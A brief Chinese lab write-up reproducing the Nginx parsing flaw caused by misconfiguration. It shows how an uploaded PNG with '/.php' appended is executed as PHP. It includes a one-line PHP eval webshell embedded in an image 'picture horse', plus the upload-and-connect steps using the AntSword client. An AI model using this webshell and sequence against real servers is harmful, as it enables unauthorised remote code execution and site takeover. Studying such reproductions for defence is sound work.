-Nginx 解析漏洞
Nginx 1.x 最新版
PHP 7.x最新版
由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。
漏洞复现
开始配置环境
访问
http://your-ip/uploadfiles/nginx.png
与增加后缀/.php后的图片文件
http://your-ip/uploadfiles/nginx.png/.php
可以发现png图片文件被当成php来解析,可以配合上传漏洞上传后门脚本。
http://your-ip/index.php存在文件上传
利用cmd命令合成一个图片马
<?php
@eval($_POST['ant']);
?>
然后将图片马上传到网站
上传成功,访问路径
成功访问图片,在路径后加/.php观察
成解析成php代码。
然后利用蚁剑来尝试连接。
成功拿下后台。